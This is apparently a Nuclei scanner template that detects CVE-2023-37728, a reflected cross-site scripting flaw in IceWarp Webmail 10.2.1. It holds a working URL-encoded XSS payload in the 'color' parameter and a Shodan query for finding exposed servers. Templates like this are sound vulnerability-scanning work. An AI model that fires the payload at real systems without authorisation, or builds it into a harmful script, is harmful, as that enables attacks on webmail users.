47 lines
1.7 KiB
YAML
47 lines
1.7 KiB
YAML
id: CVE-2023-37728
|
|
|
|
info:
|
|
name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting
|
|
author: technicaljunkie,r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
|
|
reference:
|
|
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
|
|
- http://icearp.com
|
|
- http://icewarp.com
|
|
- https://medium.com/%40ayush.engr29/cve-2023-37728-6dfb7586311
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-37728
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00167
|
|
epss-percentile: 0.53379
|
|
cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: icewarp
|
|
product: icewarp
|
|
shodan-query: http.favicon.hash:2144485375
|
|
tags: cve,cve2023,icearp,icewarp,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
|
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
|
|
- 'contains(body, "<img src onerror=alert(document.domain)>")'
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450220505e8198f30089a3ce6e5fad4e4ee8c0010d100b14730401b35d2f9abc90a037022100efe98aaef7882646d92434968d81afec1a67c18fd32e3a734ec6619ce30f71b6:922c64590222798bb761d5b6d8e72950 |